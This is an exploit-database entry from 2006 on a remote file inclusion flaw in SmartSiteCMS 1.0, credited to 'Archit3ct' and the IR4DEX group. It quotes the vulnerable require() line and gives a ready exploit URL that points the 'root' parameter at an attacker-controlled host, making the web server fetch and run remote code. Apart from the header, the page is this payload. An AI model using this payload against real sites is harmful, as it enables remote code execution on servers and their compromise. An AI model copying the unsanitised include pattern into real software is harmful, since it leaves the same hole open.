SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability
# Published : 2006-06-20
# Author : Archit3ct
# Previous Title : dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability
# Next Title : IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability

# smartsite cms <= 1.0 Remote File Inclusion
#
# Contact : irc.gigachat.net #ir4dex
# Risk : High
# Class : Remote
# Script : smartsite cms
# Version : not specified
# URL: http://www.smartsitecms.net/
---------------------------------------------------------------------

Vulnerable code :

require($root . "include/inc_foot.php");

---------------------------------------------------------------------

http://www.site.com/[smartsitecmspath]/include/inc.foot.php?root=http://[attacker]

by Archit3ct and IR4DEX GROUP

Greetz: Darkfire

# www.Syue.com [2006-06-20]